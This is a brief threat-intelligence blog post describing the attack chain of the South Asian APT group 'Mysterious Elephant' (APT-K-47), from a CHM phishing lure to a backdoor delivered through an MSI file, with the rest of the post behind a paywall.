Cybersecurity

APT-K-47 "Mysterious Elephant": A New APT Organization in South Asia

By TFH,

Published on Aug 19, 2023   —   3 min read

In the dynamic battlefield of cyberspace, the emergence of new Advanced Persistent Threats (APTs) is a relentless challenge. APT-K-47, dubbed "Mysterious Elephant," has recently surfaced in South Asia, particularly targeting Pakistan. This blog post unravels the intricate details of this new APT organization, offering insights into its tactics, techniques, and procedures (TTPs).

The Anatomy of the Attack Chain

The attack chain of APT-K-47, known as "Mysterious Elephant," is a masterclass in precision and stealth. This section dissects the various stages of the attack, from the initial bait to the final strike, providing a comprehensive view of how this new APT organization in South Asia orchestrates its cyber onslaught.

Phishing Email: The Bait

The attack commences with a phishing email containing a CHM file, masquerading as content from the "Russia-China Committee for Friendship, Peace, and Development."

Malicious CHM File: The Hook

The CHM file's malicious component, doc.html, creates a scheduled task running every 15 minutes, downloading and executing a second-order malicious program.

Second-Order Attack: The Strike

The second-order MSI file harbors a black file (ORPCBackdoor) and a white file (Microsoft's official service file), with the latter launching the former.

Multi-Country Targeting: The Scope

Contrary to initial reports, the attack targets multiple countries, not just Pakistan, as evidenced by the phishing file's content and Knownsec's remote sensing mapping big data.

This post is for subscribers only

Subscribe now and have access to all our stories, enjoy exclusive content and stay up to date with constant updates.

Subscribe

Already have an account? Sign in

Share on Facebook Share on Linkedin Share on Twitter Send by email

Subscribe to the newsletter

Subscribe to the newsletter for the latest news and work updates straight to your inbox, every week.

Subscribe